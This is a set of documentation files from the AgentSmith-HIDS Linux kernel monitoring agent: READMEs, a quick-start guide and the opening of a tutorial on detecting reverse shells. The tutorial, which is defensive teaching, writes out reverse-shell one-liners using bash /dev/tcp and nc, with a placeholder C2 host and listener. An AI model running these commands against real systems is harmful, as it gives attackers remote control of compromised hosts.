灾难控制局微信公众号\n\n会时不时有一些AgentSmith-HIDS的更新介绍和能力详解,有兴趣的可以关注:\n\n\n\n\n## License\n\nAgentSmith-HIDS kernel module are distributed under the GNU GPLv2 license.\n" }, { "path": "README.md", "content": "# AgentSmith-HIDS\n\n                        --The name of this project was inspired by the movie - The Matrix\n\n[![License](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](https://github.com/DianrongSecurity/AgentSmith-HIDS/blob/master/LICENSE) [![Project Status: Active – The project has reached a stable, usable state and is being actively developed.](https://www.repostatus.org/badges/latest/active.svg)](https://www.repostatus.org/#active)\n\nEnglish | [简体中文](README-zh_CN.md)\n\n\n\n# THIS REPO IS OLD \n# RELEASE VERSION: https://github.com/bytedance/Elkeid\n\n\n### About AgentSmith-HIDS\n\nTechnically, AgentSmith-HIDS is not a Host-based Intrusion Detection System (HIDS) due to lack of rule engine and detection function. However, it can be used as a high performance 'Host Information Collect Agent' as part of your own HIDS solution.\nThe comprehensiveness of information which can be collected by this agent was one of the most important metrics during developing this project, hence it was built to function in the kernel stack and achieve huge advantage comparing to those function in user stack, such as:\n\n* **Better performance**, Information needed are collected in kernel stack to avoid additional supplement actions such as traversal of '/proc'; and to enhance the performance of data transportation, data collected is transferred via shared ram instead of netlink.\n* **Hard to be bypassed**, Information collection was powered by specifically designed kernel drive, makes it almost impossible to bypass the detection for malicious software like rootkit, which can deliberately hide themselves.\n* **Easy to be integrated**,The AgentSmith-HIDS was built to integrate with other applications and can be used not only as security tool but also a good monitoring tool, or even a good detector of your assets. The agent is capable of collecting the users, files, processes and internet connections for you, so let's imagine when you integrate it with CMDB, you could get a comprehensive map consists of your network, host, container and business (even dependencies). What if you also have a Database audit tool at hand? The map can be extended to contain the relationship between your DB, DB User, tables, fields, applications, network, host and containers etc. Thinking of the possibility of integration with network intrusion detection system and/or threat intelligence etc., higher traceability could also be achieved. It just never gets old.\n* **Kernel stack + User stack**,AgentSmith-HIDS also provide user stack module, to further extend the functionality when working with kernel stack module.\n\n\n\n### Major abilities of AgentSmith-HIDS:\n\n* Kernel stack module hooks **execve, connect, process inject, create file, DNS query, load LKM** behaviors via Kprobe,and is also capable of monitoring containers by being compatible with Linux namespace.\n* User stack module utilize built in detection functions including queries of **User List**,**Listening ports list**,**System RPM list**,**Schedule jobs**\n* **AntiRootkit**,From: [Tyton](https://github.com/nbulischeck/tyton) ,for now add **PROC_FILE_HOOK**,**SYSCALL_HOOK**,**LKM_HIDDEN**,**INTERRUPTS_HOOK** feature,but only wark on Kernel > 3.10.\n* Cred Change monitoring (sudo/su/sshd except)\n* User Login monitoring\n\n\n### Usage scenarios/methods of AgentSmith-HIDS (to be added)\n\n* [How to detect reverse shell by AgentSmith HIDS](doc/How-to-use-AgentSmith-HIDS-to-detect-reverse-shell/How-to-detect-reverse-shell-by-AgentSmith-HIDS.md)\n\n\n### About the compatibility with Kernel version\n\n* Kernel > 2.6.25\n* AntiRootKit > 3.10\n\n\n### About the compatibility with Containers\n\n| Source | Nodename |\n| ------ | -------------- |\n| Host | hostname |\n| Docker | container name |\n| k8s | pod name |\n\n\n\n\n### Composition of AgentSmith-HIDS\n\n* **Kernel stack module (LKM)**\n Hook key functions via Kprobe to capture information needed.\n* **User stack module** \n Collect data capatured by kernel stack module, perform necessary process and send it to Kafka; \n Keep sending heartbeat packet to server so process integrity can be identitied; \n Execute commands received from server.\n* **Agent Server**(Optional)\n Send commands to user stack module and monitoring the status of user stack module.\n\n### Execve Hook\n\nAchieved by hooking **sys_execve()/sys_execveat()/compat_sys_execve()/compat_sys_execveat()**, example:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"59\",\n \"run_path\":\"/tmp\",\n \"exe\":\"/opt/ltp/testcases/bin/growfiles\",\n \"argv\":\"growfiles -W gf26 -D 0 -b -i 0 -L 60 -u -B 1000b -e 1 -r 128-32768:128 -R 512-64000 -T 4 -f gfsmallio-35861 -d /tmp/ltp-Ujxl8kKsKY \",\n \"pid\":\"35861\",\n \"ppid\":\"35711\",\n \"pgid\":\"35861\",\n \"tgid\":\"35861\",\n \"comm\":\"growfiles\",\n \"nodename\":\"test\",\n \"stdin\":\"/dev/pts/1\",\n \"stdout\":\"/dev/pts/1\",\n \"sessionid\":\"3\",\n \"sip\":\"192.168.165.1\",\n \"sport\":\"61726\",\n \"dip\":\"192.168.165.128\",\n \"dport\":\"22\",\n \"sa_family\":\"1\",\n \"pid_tree\":\"1(systemd)->1384(sshd)->2175(sshd)->2177(bash)->2193(fish)->35552(runltp)->35711(ltp-pan)->35861(growfiles)\",\n \"tty_name\":\"pts1\",\n \"socket_process_pid\":\"2175\",\n \"socket_process_exe\":\"/usr/sbin/sshd\",\n \"SSH_CONNECTION\":\"192.168.165.1 61726 192.168.165.128 22\",\n \"LD_PRELOAD\":\"/root/ldpreload/test.so\",\n \"user\":\"root\",\n \"time\":\"1579575429143\",\n \"local_ip\":\"192.168.165.128\",\n \"hostname\":\"test\",\n \"exe_md5\":\"01272152d4901fd3c2efacab5c0e38e5\",\n \"socket_process_exe_md5\":\"686cd72b4339da33bfb6fe8fb94a301f\"\n}\n```\n\n### Bind Hook\n\nAchieved by hooking **sys_bind()**, example:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"49\",\n \"sa_family\":\"2\",\n \"exe\":\"/usr/bin/python2.7\",\n \"pid\":\"109640\",\n \"ppid\":\"215496\",\n \"pgid\":\"109640\",\n \"tgid\":\"109640\",\n \"comm\":\"python\",\n \"nodename\":\"n225-117-018\",\n \"sip\":\"0.0.0.0\",\n \"sport\":\"8000\",\n \"res\":\"0\",\n \"sessionid\":\"30\",\n \"user\":\"root\",\n \"time\":\"1587540231936\",\n \"local_ip_str\":\"10.225.117.18\",\n \"hostname_str\":\"n225-117-018\",\n \"exe_md5\":\"4f458165a2129ba549f1b6605ee87e74\"\n}\n```\n\n### Connect Hook\n\nAchieved by hooking **tcp_v4_connect()/tcp_v6_connect()/ip4_datagram_connect()/ip6_datagram_connect()**, example:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"42\",\n \"sa_family\":\"2\",\n \"connect_type\":\"4\",\n \"dport\":\"1025\",\n \"dip\":\"180.101.49.11\",\n \"exe\":\"/usr/bin/ping\",\n \"pid\":\"6294\",\n \"ppid\":\"1941\",\n \"pgid\":\"6294\",\n \"tgid\":\"6294\",\n \"comm\":\"ping\",\n \"nodename\":\"test\",\n \"sip\":\"192.168.165.153\",\n \"sport\":\"45524\",\n \"res\":\"0\",\n \"sessionid\":\"1\",\n \"user\":\"root\",\n \"time\":\"1575721921240\",\n \"local_ip\":\"192.168.165.153\",\n \"hostname\":\"test\",\n \"exe_md5\":\"735ae70b4ceb8707acc40bc5a3d06e04\"\n}\n```\n\n\n\n### DNS Query Hook\n\nAchieved by hooking **udp_recvmsg()/udpv6_recvmsg()**, example:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"601\",\n \"sa_family\":\"2\",\n \"dport\":\"53\",\n \"dip\":\"192.168.165.2\",\n \"exe\":\"/usr/bin/ping\",\n \"pid\":\"6294\",\n \"ppid\":\"1941\",\n \"pgid\":\"6294\",\n \"tgid\":\"6294\",\n \"comm\":\"ping\",\n \"nodename\":\"test\",\n \"sip\":\"192.168.165.153\",\n \"sport\":\"53178\",\n \"qr\":\"1\",\n \"opcode\":\"0\",\n \"rcode\":\"0\",\n \"query\":\"www.baidu.com\",\n \"sessionid\":\"1\",\n \"user\":\"root\",\n \"time\":\"1575721921240\",\n \"local_ip\":\"192.168.165.153\",\n \"hostname\":\"test\",\n \"exe_md5\":\"39c45487a85e26ce5755a893f7e88293\"\n}\n```\n\n\n\n### Create File Hook\n\nAchieved by hooking **security_inode_create()**, example:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"602\",\n \"exe\":\"/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.232.b09-0.el7_7.x86_64/jre/bin/java\",\n \"file_path\":\"/tmp/kafka-logs/replication-offset-checkpoint.tmp\",\n \"pid\":\"3341\",\n \"ppid\":\"1\",\n \"pgid\":\"2657\",\n \"tgid\":\"2659\",\n \"comm\":\"kafka-scheduler\",\n \"nodename\":\"test\",\n \"sessionid\":\"3\",\n \"user\":\"root\",\n \"time\":\"1575721984257\",\n \"local_ip\":\"192.168.165.153\",\n \"hostname\":\"test\",\n \"exe_md5\":\"215be70a38c3a2e14e09d637c85d5311\",\n \"create_file_md5\":\"d41d8cd98f00b204e9800998ecf8427e\"\n}\n```\n\n\n\n### Process Inject Hook\n\nAchieved by hooking **sys_ptrace()**, example:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"101\",\n \"ptrace_request\":\"4\",\n \"target_pid\":\"7402\",\n \"addr\":\"00007ffe13011ee6\",\n \"data\":\"-a\",\n \"exe\":\"/root/ptrace/ptrace\",\n \"pid\":\"7401\",\n \"ppid\":\"1941\",\n \"pgid\":\"7401\",\n \"tgid\":\"7401\",\n \"comm\":\"ptrace\",\n \"nodename\":\"test\",\n \"sessionid\":\"1\",\n \"user\":\"root\",\n \"time\":\"1575722717065\",\n \"local_ip\":\"192.168.165.153\",\n \"hostname\":\"test\",\n \"exe_md5\":\"863293f9fcf1af7afe5797a4b6b7aa0a\"\n}\n```\n\n\n### Load LKM File Hook\n\nAchieved by hooking **load_module()**, example:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"603\",\n \"exe\":\"/usr/bin/kmod\",\n \"lkm_file\":\"/root/ptrace/ptrace\",\n \"pid\":\"29461\",\n \"ppid\":\"9766\",\n \"pgid\":\"29461\",\n \"tgid\":\"29461\",\n \"comm\":\"insmod\",\n \"nodename\":\"test\",\n \"sessionid\":\"13\",\n \"user\":\"root\",\n \"time\":\"1577212873791\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\",\n \"exe_md5\":\"0010433ab9105d666b044779f36d6d1e\",\n \"load_file_md5\":\"863293f9fcf1af7afe5797a4b6b7aa0a\"\n}\n```\n\n\n### Cred Change Hook\n\nAchieved by Hook **commit_creds()**,example:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"604\",\n \"exe\":\"/tmp/tt\",\n \"pid\":\"27737\",\n \"ppid\":\"26865\",\n \"pgid\":\"27737\",\n \"tgid\":\"27737\",\n \"comm\":\"tt\",\n \"old_uid\":\"1000\",\n \"nodename\":\"test\",\n \"sessionid\":\"42\",\n \"user\":\"root\",\n \"time\":\"1578396197131\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\",\n \"exe_md5\":\"d99a695d2dc4b5099383f30964689c55\"\n}\n```\n\n\n### User Login Alert\n```json\n{\n \"data_type\":\"1001\",\n \"status\":\"Failed\",\n \"type\":\"password\",\n \"user_exsit\":\"false\",\n \"user\":\"sad\",\n \"from_ip\":\"192.168.165.1\",\n \"port\":\"63089\",\n \"processor\":\"ssh2\",\n \"time\":\"1578405483119\",\n \"local_ip\":\"192.168.165.128\",\n \"hostname\":\"localhost.localdomain\"\n}\n```\n\n\n### PROC File Hook Alert\n```json\n{\n \"uid\":\"-1\",\n \"data_type\":\"700\",\n \"module_name\":\"autoipv6\",\n \"hidden\":\"0\",\n \"time\":\"1578384987766\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\"\n}\n```\n\n\n### Syscall Hook Alert\n```json\n{\n \"uid\":\"-1\",\n \"data_type\":\"701\",\n \"module_name\":\"diamorphine\",\n \"hidden\":\"1\",\n \"syscall_number\":\"78\",\n \"time\":\"1578384927606\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\"\n}\n```\n\n\n### LKM Hidden Alert\n```json\n{\n \"uid\":\"-1\",\n \"data_type\":\"702\",\n \"module_name\":\"diamorphine\",\n \"hidden\":\"1\",\n \"time\":\"1578384927606\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\"\n}\n```\n\n\n### Interrupts Hook Alert\n```json\n{\n \"uid\":\"-1\",\n \"data_type\":\"703\",\n \"module_name\":\"syshook\",\n \"hidden\":\"1\",\n \"interrupt_number\":\"2\",\n \"time\":\"1578384927606\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\"\n}\n```\n\n\n### About Performance of AgentSmith-HIDS\n\nTesting Environment(VM):\n\n| CPU | Intel(R) Xeon(R) Platinum 8260 CPU @ 2.40GHz 4Core |\n| --------- | ------------------------------------------------ |\n| RAM | 8GB |\n| OS/Kernel | Debian9 / 4.14.81.bm.19-amd64 |\n\nTesting Load:\n\n`ltp -f syscalls`\n\nTesting Result(1min):\n\n| Hook Handler | Average Delay(us) | TP99(us) | TP95(us) | TP90(us) |\n| ---------------------- | ----------------- | ----|----|----|\n| connect_entry_handler| 0.2914 |6.7627|0.355|0.3012|\n| connect_handler | 2.1406 |18.3801|12.102|7.832|\n| execve_entry_handler | 5.9320 |13.7034|9.908|8.334|\n| execve_handler | 6.8826 |26.0584|15.9976|12.6260|\n| security_inode_create_entry_handler| 1.9963|9.3042|6.7730|4.6816|\n| security_inode_create_handler| 4.2114|13.2165|8.83775|6.534|\n\nOriginal Testing Data:\n\n[Benchmark Data](https://github.com/EBWi11/AgentSmith-HIDS/tree/master/benchmark_data)\n\n\n**cyclictest testing**\n\n`cyclictest -p 90 - m -c 0 -i 200 -n -h 100 -q -l 1000000`\n\nUninstall Smith:\n```\n# Total: 000999485\n# Min Latencies: 00002\n# Avg Latencies: 00007\n# Max Latencies: 13905\n# Histogram Overflows: 00515\n```\n\ninstall Smith:\n```\n# Total: 000999519\n# Min Latencies: 00002\n# Avg Latencies: 00007\n# Max Latencies: 15216\n# Histogram Overflows: 00481\n```\n\n\n**time -v /opt/ltp/testcases/bin/execve05 -n 30000**\n\n10 times\n\nInstall Smith:\n\n| Average User Time(s) | Average System Time(s) |\n| ---------------------- | ----------------- |\n|22.329|14.885|\n\nUninstall Smith:\n\n| Average User Time(s) | Average System Time(s) |\n| ---------------------- | ----------------- |\n|22.271|14.395|\n\n### Documents for deployment and testing purpose:\n\n[Quick Start](https://github.com/EBWi11/AgentSmith-HIDS/blob/master/doc/AgentSmith-HIDS-Quick-Start.md)\n\n\n\n\n### Special Thanks(Not in order)\n\n[yuzunzhi](https://github.com/yuzunzhi)\n\n[hapood](https://github.com/hapood)\n\n[HF-Daniel](https://github.com/HF-Daniel)\n\n[smcdef](https://github.com/smcdef)\n\n\n### Wechat of developer\n\n\n\n\n### Wechat channel of '灾难控制局'\n\nWe would constantly provide information about the functionalities of AgentSmith-HIDS via this channel, a good place to receive the most updated news:)\n\n\n\n\n## License\n\nAgentSmith-HIDS kernel module are distributed under the GNU GPLv2 license.\n" }, { "path": "doc/AgentSmith-HIDS ToDo List.md", "content": "### AgentSmith-HIDS ToDo List\n\n* 梳理ATT&CK,一一对应\n* 自动化稳定性测试/自动化全版本编译\n* 提权检测\n* 更好的兼容K8S\n* Rootkit/Bootkit\n* 规则引擎\n* 更好的发行版适配\n* 一部分必要的User Space Hook\n* 定时任务/开机启动项获取\n* 包/类库版本获取\n* Agent 增加 STDOUT\n" }, { "path": "doc/AgentSmith-HIDS-Quick-Start-zh_CN.md", "content": "# AgentSmith-HIDS Quick Start\n\n[English](AgentSmith-HIDS-Quick-Start.md) | 简体中文\n\n\n### 1.AgentSmith-HIDS 简单流程图\n\n![simple_flow_chart](simple_flow_chart.png)\n\n\n\n### 2.Get Clone Project\n\n`git clone https://github.com/EBWi11/AgentSmith-HIDS.git`\n\n\n\n### 3.编译内核驱动模块\n\n* `yum` 或者 `apt` 或者其他方式安装 `kernel-devel` && `kernel-header`\n* 在`driver/LKM`目录执行`make`,得到'smith.ko'\n* 执行`insmod smith.ko`\n* 执行`lsmod | grep smitm`,验证smith驱动已安装成功\n* 下发编译好的LKM文件到测试服务器,注意Kernel版本需要和编译服务器保持一致。\n\n![quick-start-01](quick-start-01.png)\n\n\n\n### 4.Test 'smith.ko'\n\n* `yum` 或者 `apt` 或者其他方式安装 `gcc`\n* 在:`driver/test`目录并且执行`gcc -o test shm_user.c`得到'test'测试文件\n* 执行 `./test`,验证AgentSmith-HIDS的核心模块运行正常\n\n![quick-start-02](quick-start-02.png)\n\n\n\n### 5.部署Kafka环境 && 部署Agent Server环境(可选)\n\n* 部署测试环境接收端Kafka Server,注意需要手动创建topic:\n 创建topic:`./kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic hids`\n\n* (可选)部署测试环境HIDS心跳Server,具体请看:[smith_console](https://github.com/EBWi11/AgentSmith-HIDS/tree/master/smith_console)\n\n\n\n### 6.编译用户态模块\n\n* 需要Rust-lang环境: https://www.rust-lang.org/tools/install\n\n* 在目录:`agent/src/conf`下,先修改agent配置文件:`agent/src/conf/settings.rs`,修改相关的Kafka信息和心跳配置,通过`cargo build —-release`,在`agent/target/release/`下得到编译好的agent。(注:需要提前`install openssl` && `install openssl-devel`)\n\n* 安装agent,下发agent到测试环境,直接执行即可\n\n注:由于Agent取本机IP是通过命令:hostname -i,所以测试时请保证hostname和hosts配置正确,否则HIDS Console端无法读取正确的IP。)\n\n\n![quick-start-03](quick-start-03.png)\n\n\n\n### 7.自定义检测模块\n\n1. 自定义检测模块依赖心跳检测模块,既需要开启心跳检测才可支持自定义检测模块;\n2. 自定义检测模块的触发方式是心跳Server向Agent下发指令完成的,检测结果通过Kafka传递到Server端,因此不具备实时性;\n3. 自定义检测函数添加在[detection_module.rs](https://github.com/EBWi11/AgentSmith-HIDS/blob/master/agent/src/lib/detection_module.rs) 文件下,并且需要在该文件的Detective impl的start函数定义好Mapping关系(Server下发指令和调用的检测函数关系);\n4. 添加完自定义检测函数后需要在[heartbeat_server.py](https://github.com/EBWi11/AgentSmith-HIDS/blob/master/smith_console/heartbeat_server.py) 中添加下发指令逻辑,注意需要和其他指令通过“;”间隔;\n5. 实现逻辑,Agent向心跳服务器发送心跳包,Server返回检测指令,Agent通过指令和检测函数的Mapping执行指令所指的检测函数,检测结果通过Kafka传递到Server端。\n\n\n\n### 8.卸载\n* 卸载AgentSmith-HIDS前需要先关闭用户态agent进程,agent默认Log path:`/var/log/smith_hids.log`,默认pid file:`/var/run/smith_hids.pid`,默认下:`cat /var/run/smith_hids.pid |xargs kill -9`再通过`rmmod smith`来完成卸载。\n\n\n\n### 9.Smith LKM Definition\n\n| Define | Description |\n| ---------------- | ------------------------------------------------------------ |\n| EXECVE_HOOK | execve() Hook Switch:
1. Enable;
Default:1 |\n| CONNECT_HOOK | connect() Hook Switch:
1. Enable;
Default:1 |\n| BIND_HOOK | Bind Hook Switch:
1. Enable;
Default:1 |\n| DNS_HOOK | DNS Hook Switch:
1. Enable;
Default:1 |\n| PTRACE_HOOK | Porcess Injection Detect Hook Switch:
1. Enable;
Default:1 |\n| CREATE_FILE_HOOK | Create File Detect Hook Switch:
1. Enable;
Default:1 |\n| LOAD_MODULE_HOOK | init_module() Hook Switch:
1. Enable;
Default:1 |\n| EXIT_PROTECT | Protect the agent itself from being rmmod:
1.Enable;
Default: 0 |\n| ROOTKIT_CHECK | Regularly detect rootkit behavior. The default is 15 seconds:
1.Enable;
Default: 1 |\n| UPDATE_CRED_HOOK | Detect abnormal process Cred changes in real time:
1.Enable;
Default: 1 |\n\n\n\n### 10.Simple Demo\n\n![Demo](demo.gif)\n\n" }, { "path": "doc/AgentSmith-HIDS-Quick-Start.md", "content": "# AgentSmith-HIDS Quick Start\n\nEnglish | [简体中文](AgentSmith-HIDS-Quick-Start-zh_CN.md)\n\n\n### 1.AgentSmith-HIDS Work Flow Chart\n\n![simple_flow_chart](simple_flow_chart.png)\n\n\n\n### 2.Get Clone Project\n\n`git clone https://github.com/EBWi11/AgentSmith-HIDS.git`\n\n\n\n### 3.Compile LKM,Get 'smith.ko' File\n\n* `yum` or `apt` or other package tools install `kernel-devel` && `kernel-header`\n* go to directory:`driver/LKM` and execute `make`,you can get 'smith.ko' file\n* execute `insmod smith.ko`\n* execute `lsmod | grep smitm`,verify load lkm is success\n* publish the compiled LKM file(smith.ko) to your test server. Please pay attention that the Kernel version needs to be consistent with the server used for compiling\n\n![quick-start-01](quick-start-01.png)\n\n\n\n### 4.Test 'smith.ko'\n\n* `yum` or `apt` or other package tools install `gcc`\n* go to directory:`driver/test` and execute `gcc -o test shm_user.c`,you can get 'test'\n* execute `./test`,verify core is work\n\n![quick-start-02](quick-start-02.png)\n\n\n\n### 5.Deploy the Kafka Server && Agent Server(Optional)\n\n* in your test environment for receiving information and create topic manually:\n like this `./kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic hids`\n\n* (Optional) deploy a heartbeat server in your test environment,please refer to:[smith_console](https://github.com/EBWi11/AgentSmith-HIDS/tree/master/smith_console)\n\n\n\n### 6.Compile User Space Module\n\n* need intall rust environment: https://www.rust-lang.org/tools/install\n\n* go to directory:`agent/src/conf` and modify the related Kafka information and heartbeat configuration in configuration file of the agent: `agent/src/conf/settings.rs`, then run `cargo build --release`, on `agent/target/release/` can get agent.(maybe need `install openssl` && `install openssl-devel`)\n\n* Install the agent: deploy the agent to your test environment and execute it directly\n\nNote: Since the Agent obtains the local IP through the command: hostname -i, please ensure that the hostname and hosts are configured correctly during the test to prevent the HIDS Console from getting a wrong one.\n\n![quick-start-03](quick-start-03.png)\n\n\n\n### 7.Custom detection module\n\n1. The custom detection module relies on the heartbeat detection module. You need to enable heartbeat detection to support the custom detection module;\n2. The triggering method of the custom detection module is completed by the heartbeat server sending instructions to the agent, and the detection result is transmitted to the server through Kafka, so it is not real-time;\n3. The custom detection function is added in the [detection_module.rs](https://github.com/EBWi11/AgentSmith-HIDS/blob/master/agent/src/lib/detection_module.rs) file, and the start function definition of the Detective impl in this file needs Good mapping relationship (the relationship between the instruction issued by the server and the detection function called);\n4. After adding the custom detection function, you need to add the issuing instruction logic in [heartbeat_server.py](https://github.com/EBWi11/AgentSmith-HIDS/blob/master/smith_console/heartbeat_server.py). Note that you need to pass \";\" interval;\n5. Implement the logic. The agent sends a heartbeat packet to the heartbeat server. The server returns the detection instruction. The agent executes the detection function indicated by the instruction through the mapping of the instruction and the detection function. The detection result is transmitted to the server through Kafka.\n\n\n\n### 8.Uninstall\n* Before uninstalling the AgentSmith-HIDS, you need to close the user-mode agent process. The default Log path of the agent is located in: `/var/log/smith_hids.log`, and also the default pid file in: `/var/run/smith_hids.pid`. By default: `cat /var/run/smith_hids.pid |xargs kill -9` then uninstall it by `rmmod smith`\n\n\n\n\n### 9.Smith LKM Definition\n\n| Define | Description |\n| ---------------- | ------------------------------------------------------------ |\n| EXECVE_HOOK | execve() Hook Switch:
1. Enable;
Default:1 |\n| CONNECT_HOOK | connect() Hook Switch:
1. Enable;
Default:1 |\n| BIND_HOOK | Bind Hook Switch:
1. Enable;
Default:1 |\n| DNS_HOOK | DNS Hook Switch:
1. Enable;
Default:1 |\n| PTRACE_HOOK | Porcess Injection Detect Hook Switch:
1. Enable;
Default:1 |\n| CREATE_FILE_HOOK | Create File Detect Hook Switch:
1. Enable;
Default:1 |\n| LOAD_MODULE_HOOK | init_module() Hook Switch:
1. Enable;
Default:1 |\n| EXIT_PROTECT | Protect the agent itself from being rmmod:
1.Enable;
Default: 0 |\n| ROOTKIT_CHECK | Regularly detect rootkit behavior. The default is 15 seconds:
1.Enable;
Default: 1 |\n| UPDATE_CRED_HOOK | Detect abnormal process Cred changes in real time:
1.Enable;
Default: 1 |\n\n### 10.Simple Demo\n\n![Demo](demo.gif)\n\n" }, { "path": "doc/How-to-use-AgentSmith-HIDS-to-detect-reverse-shell/How-to-detect-reverse-shell-by-AgentSmith-HIDS.md", "content": "# How to detect reverse shell by AgentSmith-HIDS \n\nReverse shell is a kind of post-invasion behavior with a long history, and is used by various kinds of attackers from script kiddie to APT attackers. Therefore, for an HIDS, it is inevitable that detection capability should be considered. However, there are plenty of, and highly flexible ways to achieve reversing shell, while currently few common detection methods that provide low false positive and false negative rates. AgentSmith-HIDS, as a product specially designed for intrusion detection, will bring you a different thought and approach.\n\n\n#### 1.What is a reverse shell\n\nWhen hackers get the permissions of a server, usually they cannot connect the host via a forward tunnel such as SSH due to no public IP bind to it or the connection is blocked by a firewall. So, they will need the compromised server itself to actively establish a connection to their remote side, therefore further commands can be passed to the host through it, that is called **reverse shell**.\n\n![1](1.png)\n\n\n\n#### 2.Execve Hook Information of AgentSmith-HIDS\n\nSince the main idea of this article is to explain how we can use **AgentSmith-HIDS** to detect the reverse shell, and basically, we will use Execve Hook information to detect it, it is helpful to look into Execve Hook information carefully at the beginning.\n\nLet's look at an example first:\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"59\",\n \"run_path\":\"/usr/bin/ls\",\n \"exe\":\"/usr/bin/ls\",\n \"argv\":\"ls --color=auto --indicator-style=classify \",\n \"pid\":\"6766\",\n \"ppid\":\"2202\",\n \"pgid\":\"6766\",\n \"tgid\":\"6766\",\n \"comm\":\"ls\",\n \"nodename\":\"test\",\n \"stdin\":\"/dev/pts/2\",\n \"stdout\":\"/dev/pts/2\",\n \"sessionid\":\"5\",\n \"dip\":\"192.168.165.1\",\n \"dport\":\"50431\",\n \"sip\":\"192.168.165.152\",\n \"sport\":\"22\",\n \"sa_family\":\"1\",\n \"pid_tree\":\"1(systemd)->1565(sshd)->2129(sshd)->2132(bash)->2202(fish)->6766(ls)\",\n \"tty_name\":\"pts2\",\n \"socket_process_pid\":\"2129\",\n \"socket_process_exe\":\"/usr/sbin/sshd\",\n \"SSH_CONNECTION\":\"192.168.165.1 50431 192.168.165.152 22\",\n \"LD_PRELOAD\":\"\",\n \"user\":\"root\",\n \"time\":\"1580104906853\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\",\n \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n \"socket_process_exe_md5\":\"686cd72b4339da33bfb6fe8fb94a301f\"\n}\n```\n\nPart of the field information and source (other basic information will not be repeated):\n\n| Field | Remark |\n| ------------------------------------- | -----------------------------------------------------------------|\n| nodename | Node name of Linux namespace, hostname or container name |\n| stdin/stdout | Process standard input / standard output information |\n| sessionid | Process session id |\n| pid_tree | Process tree |\n| dip/dport/sip/sport | **4-tuple of the first socket of the process tree where this process is under (looking in ascending order and limited to AF_INET or AF_INET6)** |\n| socket_process_pid/socket_process_exe | The pid and exe information of the first valid socket process |\n| tty_name | Process tty information |\n| SSH_CONNECTION | Extracted from environment variables, SSH connection information |\n| LD_PRELOAD | Extracted from environment variables, LD_PRELOAD |\n\nAmong them, it may be a bit difficult to understand **dip/dport/sip/sport** . Let's look at the above example: it can be determined that the **ls** command has been executed via **exe** and **argv** . Meantime, we looked into **dip/dport/sip/sport** and **socket_process_pid / socket_process_exe**, we got to know that this is a connection by **sshd** and a **ssh**. Since**ls** itself does not need network connection, then AgentSmith-HIDS will look up and stops if find a valid process or reach the head of the tree if nothing found. Obviously, the **ls** command is executed by someone who logged onto this host via a SSH tunnel, we will find the connection information for the **ssh**. This also can be found when you compare with **SSH_CONNECTION** in the environment variable.\n\n![4](4.png)\n\nIt should be noted that this information may be interfered. Due to performance considerations, we don't want to extract all the socket information or traverse all the 'fd' of each process, which will become a potential limitation.\n\n\n\n#### 3. The simplest reverse shell\n\nThe simplest reverse shell is `bash -i`, like this:\n\n`bash -i >& /dev/tcp/c2_ip/c2_port 0>& 1`\n\nThe `-i` parameter indicates that an interactive shell is generated, and then TCP takes over the input and output of the shell to achieve a reverse shell. The control terminal lies in remote side only needs to use this in advance:\n\n`nc -l port`\n\nYou can listen to the specified port and wait for the shell to visit the door obediently.\n\n![2](2.png)\n\nWhen facing this most basic reverse shell, it seems people are using the same detection approach, which is: if there is a bash process's stdin/stdout (standard input / standard output) pointing to a certain socket connection, we consider it is probably a reverse shell behavior.\n\nUsually we review the stdin/stdout of a process under `/proc/pid/fd`. By default 0 is stdin, 1 is stdout, and 2 is stderr.\n\n![3](3.png)\n\nSuch detection is pretty simple when using AgentSmith-HIDS, we can use the data obtained by the execve hook here:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"59\",\n \"run_path\":\"/usr/bin/bash\",\n \"exe\":\"/usr/bin/bash\",\n \"argv\":\"bash -i \",\n \"pid\":\"6364\",\n \"ppid\":\"2549\",\n \"pgid\":\"6364\",\n \"tgid\":\"6364\",\n \"comm\":\"bash\",\n \"nodename\":\"test\",\n \"stdin\":\"socket:[80649]\",\n \"stdout\":\"socket:[80649]\",\n \"sessionid\":\"3\",\n \"dip\":\"127.0.0.1\",\n \"dport\":\"233\",\n \"sip\":\"127.0.0.1\",\n \"sport\":\"60620\",\n \"sa_family\":\"2\",\n \"pid_tree\":\"1(systemd)->1565(sshd)->2093(sshd)->2096(bash)->2147(fish)->2549(bash)->6364(bash)\",\n \"tty_name\":\"pts0\",\n \"socket_process_pid\":\"6364\",\n \"socket_process_exe\":\"/usr/bin/bash\",\n \"SSH_CONNECTION\":\"192.168.165.1 50422 192.168.165.152 22\",\n \"LD_PRELOAD\":\"\",\n \"user\":\"root\",\n \"time\":\"1580104472249\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\",\n \"exe_md5\":\"f926bedd777fa0f4f71dd2d28155862a\",\n \"socket_process_exe_md5\":\"f926bedd777fa0f4f71dd2d28155862a\"\n}\n```\n\nPay attention to exe and stdin and stdout. According to the feature we just mentioned, you can easily find this type of reverse shell, and you can also locate C2 with the help of **dip/dport/sip/sport**.\n\nOther similar ones which you may already know well, such as python/perl reverse shell scripts, we will not discuss too much here, most of them point the stdin/out of bash to the socket connection, which is same in nature.\n\n\n\n#### 4. The easiest reverse shell(2)\n\nIn addition to `bash -i`, there is another common way is ` nc -e`, which is used as follows:\n\n`nc -e /usr/bin/bash 